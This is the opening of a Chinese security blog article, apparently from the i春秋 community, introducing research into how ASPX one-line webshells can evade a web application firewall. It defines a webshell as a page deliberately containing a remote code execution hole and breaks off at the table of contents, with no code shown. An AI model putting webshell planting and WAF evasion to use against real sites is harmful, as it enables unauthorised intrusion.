  hi,我是凉风,(以下内容纯属个人见解,如有不同的意见欢迎回复指出),本菜比发现aspx过狗的姿势不常见,不像php一样一抓一大把,于是我决定研究一下aspx。本文作者:i春秋签约作家——凉风。引用i春秋作家团大佬@非主流 对一句话木马的理解:一句话木马的意思就是,我们制造了一个包含远程代码执行漏洞的web页面。目录:0x01:我没有aspx代码编写基础,我该从哪入手?0x02...